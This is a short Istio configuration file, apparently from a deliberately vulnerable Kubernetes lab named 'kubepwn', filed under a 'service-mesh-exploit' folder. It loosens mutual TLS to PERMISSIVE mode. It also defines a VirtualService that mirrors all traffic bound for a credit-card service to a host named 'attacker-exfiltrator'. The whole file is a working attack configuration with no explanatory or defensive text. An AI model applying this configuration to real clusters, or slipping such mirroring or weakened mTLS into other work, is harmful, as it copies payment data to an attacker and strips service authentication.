bonus/service-mesh-exploit/istio-mtls-bypass.yaml
#istio-mtls-bypass.yaml
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: vulnerable-mtls
  namespace: kubepwn
spec:
  mtls:
    mode: PERMISSIVE
---
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: creditcard-svc-bypass
  namespace: kubepwn
spec:
  hosts:
  - creditcard.prod.svc.cluster.local
  http:
  - route:
    - destination:
        host: creditcard.prod.svc.cluster.local
    mirror:
      host: attacker-exfiltrator.kubepwn.svc.cluster.local
